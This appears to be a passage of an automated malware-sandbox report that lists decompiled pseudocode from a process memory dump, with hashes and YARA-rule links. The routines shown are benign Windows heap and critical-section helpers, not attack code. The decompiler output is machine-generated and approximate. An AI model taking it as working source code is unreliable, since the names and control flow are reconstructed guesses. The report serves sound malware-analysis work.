                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 01e4f35a47b25cce1683a0db11132a1c583e94f473c4dc682c3e4fdc345c165b
                                                                                                                                                    • Instruction ID: d424a952d1b214908f2a345a8230483cb5c2842e07c937631c8e2d03210cebee
                                                                                                                                                    • Opcode Fuzzy Hash: 01e4f35a47b25cce1683a0db11132a1c583e94f473c4dc682c3e4fdc345c165b
                                                                                                                                                    • Instruction Fuzzy Hash: FFF0F2788117A4CFCBA4EBA9A50876836BCE74CA1AF10416A91108B2C8EB3444C1CF21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030FA185, Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x31b67e4 >= 0xa) {
					if(_t5 < 0x31b6800 || _t5 >= 0x31b6900) {
						return L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E030E0010(0x31b67e0, _t5);
				}
			}





                                                                                                                                                    0x030fa190
                                                                                                                                                    0x030fa1a6
                                                                                                                                                    0x030fa1c2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030fa192
                                                                                                                                                    0x030fa192
                                                                                                                                                    0x030fa19f
                                                                                                                                                    0x030fa19f

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0a69ee4bee4018edda77dbbac6714b5d8e2b681b21dd9c5c747b30676b6c2c72
                                                                                                                                                    • Instruction ID: ebb85b0e2b3fbc0d4d62b2844a4c9b0b190723cf34b7b378d4e37215b67a7e21
                                                                                                                                                    • Opcode Fuzzy Hash: 0a69ee4bee4018edda77dbbac6714b5d8e2b681b21dd9c5c747b30676b6c2c72
                                                                                                                                                    • Instruction Fuzzy Hash: 44D02E327231041FD62CF30C9E24BA2222AF7DCB00F31080CE20B0EDA0EBA088D09518
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F16E0, Relevance: .0, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E030F1710(0x31b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L030E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                                                                                    0x030f16e8
                                                                                                                                                    0x030f16ef
                                                                                                                                                    0x030f16f3
                                                                                                                                                    0x030f16fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f1700
                                                                                                                                                    0x030f170d
                                                                                                                                                    0x030f170d
                                                                                                                                                    0x030f16f2
                                                                                                                                                    0x030f16f2
                                                                                                                                                    0x030f16f2
                                                                                                                                                    0x030f16f2

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8ac47a8f954e6b400e62c22cca5a24a43fae3cd31fb75cdaaebbf737e41d584b
                                                                                                                                                    • Instruction ID: 868f2e39072762727b1935ee4b8e0087145c410aaeb7a80db15ccc6030efa1c3
                                                                                                                                                    • Opcode Fuzzy Hash: 8ac47a8f954e6b400e62c22cca5a24a43fae3cd31fb75cdaaebbf737e41d584b
                                                                                                                                                    • Instruction Fuzzy Hash: A0D05231202200AADA2DDB11A804B5522A6EBC0A81F380068F20A6D8D0DFA1D8A2E048
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031453CA, Relevance: .0, Instructions: 16COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E031453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E030DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                                                                                                                                    0x031453ca
                                                                                                                                                    0x031453ce
                                                                                                                                                    0x031453d9
                                                                                                                                                    0x031453de
                                                                                                                                                    0x031453e1
                                                                                                                                                    0x031453e1
                                                                                                                                                    0x031453e6
                                                                                                                                                    0x031453f3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031453f8
                                                                                                                                                    0x031453fb

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                                    • Instruction ID: 0ec62489354b589a1d84debf2d98ee9d79564e4781cfa5c7df06735ca4084988
                                                                                                                                                    • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                                                                                                    • Instruction Fuzzy Hash: 7AE08C36A017809FCF12EB48C650F8EB7F6FB89B00F180044A0485F620C724AC00CB00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030DAAB0, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                                                                                                                                    0x030daab6
                                                                                                                                                    0x030daabb
                                                                                                                                                    0x0312a442
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312a448
                                                                                                                                                    0x0312a454
                                                                                                                                                    0x0312a454
                                                                                                                                                    0x030daac1
                                                                                                                                                    0x030daac1
                                                                                                                                                    0x030daac6
                                                                                                                                                    0x030daac6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                    • Instruction ID: 66f1e7e7bc3dac06405b437f27cd4eefb13dfb8d019080e2566c37c2f5749ebc
                                                                                                                                                    • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                                                                                                    • Instruction Fuzzy Hash: 27D0E939352A90CFD656CB1DC554B1577E8BB44B44FD905D0E501CB761E72CD954CA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F35A1, Relevance: .0, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F35A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E030DEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                                                                                                                                    0x030f35a1
                                                                                                                                                    0x030f35a1
                                                                                                                                                    0x030f35a5
                                                                                                                                                    0x030f35ab
                                                                                                                                                    0x030f35ab
                                                                                                                                                    0x030f35b5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f35c1
                                                                                                                                                    0x030f35b7

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                                    • Instruction ID: a575a65751d0b1d60c0b0f6cff8eac3d334d985c07e087b9deb53893d9f86772
                                                                                                                                                    • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                                                                                                    • Instruction Fuzzy Hash: 78D052394032809EDB82EB10C2187BCF2A2ABC0B28F5820E582420AC62822A4A0AC600
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CDB40, Relevance: .0, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030CDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L030E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                                                                                                                    0x030cdb4d
                                                                                                                                                    0x030cdb54
                                                                                                                                                    0x030cdb5f
                                                                                                                                                    0x030cdb56
                                                                                                                                                    0x030cdb56
                                                                                                                                                    0x030cdb5c
                                                                                                                                                    0x030cdb5c

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                    • Instruction ID: 8b4f6b98228338e95193a39ff7012df552d1058b9dbcac541f4ad8f4ff9ec87d
                                                                                                                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                                                                                                    • Instruction Fuzzy Hash: 15C08C30392B40AEEB229F20CD01B4076A0BB40B01F4800A06300DA0F0EBB8D801E600
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0314A537, Relevance: .0, Instructions: 11COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0314A537(intOrPtr _a4, intOrPtr _a8) {

				return L030E8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                                                                                                                                    0x0314a553

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                    • Instruction ID: 00d10099b91d7be38182873e0b189f8002bbde037cd4bf0909d0d3b46356abc5
                                                                                                                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                                                                                                                    • Instruction Fuzzy Hash: C6C01236181248BBCB12AE81CC00F567B2AEB94B60F008010BA080A6608632E970EA84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E3A1C, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030E3A1C(intOrPtr _a4) {
				void* _t5;

				return L030E4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                                                                                                                    0x030e3a35

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                    • Instruction ID: e57d4d44f6e79fd6f5519d660d417cea89082f74bbfba24960768f32a4ac1e93
                                                                                                                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                                                                                                    • Instruction Fuzzy Hash: ACC08C32180248BBCB12AE42DC00F017B29E790B60F000020B6040A5708572EC60D58C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F36CC, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                                                                                                                    0x030f36d2
                                                                                                                                                    0x030f36e8
                                                                                                                                                    0x030f36d4
                                                                                                                                                    0x030f36e5
                                                                                                                                                    0x030f36e5

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                                    • Instruction ID: fd118935d0edd7e7988d1ff0e6f35ad9c167af3421c2f72c54f638ea2f562720
                                                                                                                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                                                                                                                    • Instruction Fuzzy Hash: 38C09B7D256540BFDB559F30CD51F557294F740A71F6C07947321499F0D5699C40D508
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D76E2, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030D76E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                                                                                                                    0x030d76e4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d76f8
                                                                                                                                                    0x030d76fd

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                                    • Instruction ID: aa0bfbbfdb41c33963499c82bbac46ae150e54ada903195e4b9d702c85cea5af
                                                                                                                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                                                                                                                    • Instruction Fuzzy Hash: ABC08C742433805EEB2ADB08DE20B21B6D4AF08E08F4C019CEA410D4A1D368A802C208
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CAD30, Relevance: .0, Instructions: 10COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030CAD30(intOrPtr _a4) {

				return L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                                                                                                                    0x030cad49

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                    • Instruction ID: b68f9cf0496c9b48cfb0f67703796852c8314d43e46325c9dd6910be2d91a434
                                                                                                                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                                                                                                    • Instruction Fuzzy Hash: 83C08C32280248BBC712AA45DD00F027B29E790B60F000020F6040A6618932E860E588
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030E7D50, Relevance: .0, Instructions: 7COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030E7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                                                                                                                    0x030e7d56
                                                                                                                                                    0x030e7d5b
                                                                                                                                                    0x030e7d60
                                                                                                                                                    0x030e7d5d
                                                                                                                                                    0x030e7d5d
                                                                                                                                                    0x030e7d5d

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                    • Instruction ID: 10d709276adee5bd56012558d2d015ed0ce999599a5238611a2f917ca6224251
                                                                                                                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                                                                                                    • Instruction Fuzzy Hash: 47B09234302941CFCE56DF18C080B1533F8BB44A40B8800D0E400CBA20D229E8008900
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F2ACB, Relevance: .0, Instructions: 5COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F2ACB() {
				void* _t5;

				return E030DEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                                                                                                                    0x030f2adc

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                                    • Instruction ID: 7f5e38ed8afc6601efecef96e69d0807cf34bb6dacfe6ee0ffd22245275b55ec
                                                                                                                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                                                                                                                    • Instruction Fuzzy Hash: 18B01232C12740CFCF02FF40C610B5A7371FB80760F05449090012F930C228BC01CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0315FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                    			E0315FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0310CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03155720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03155720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                                    0x0315fdda
                                                                                                                                                    0x0315fde2
                                                                                                                                                    0x0315fde5
                                                                                                                                                    0x0315fdec
                                                                                                                                                    0x0315fdfa
                                                                                                                                                    0x0315fdff
                                                                                                                                                    0x0315fe0a
                                                                                                                                                    0x0315fe0f
                                                                                                                                                    0x0315fe17
                                                                                                                                                    0x0315fe1e
                                                                                                                                                    0x0315fe19
                                                                                                                                                    0x0315fe19
                                                                                                                                                    0x0315fe19
                                                                                                                                                    0x0315fe20
                                                                                                                                                    0x0315fe21
                                                                                                                                                    0x0315fe22
                                                                                                                                                    0x0315fe25
                                                                                                                                                    0x0315fe40

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0315FDFA
                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0315FE2B
                                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0315FE01
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                                    • API String ID: 885266447-3903918235
                                                                                                                                                    • Opcode ID: 6d93f3cf5490845714a491b3614259dfad48562f4898471182e76c87c9a3afe8
                                                                                                                                                    • Instruction ID: e7c9fd4f5d9cd180c7aa57378e0c77eebfdccd199bc54ea5896e773d08bcee83
                                                                                                                                                    • Opcode Fuzzy Hash: 6d93f3cf5490845714a491b3614259dfad48562f4898471182e76c87c9a3afe8
                                                                                                                                                    • Instruction Fuzzy Hash: 54F0C236240201FFD6249B45DC02F63BF6AEB49770F250314FA385A1D1DB62B87086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%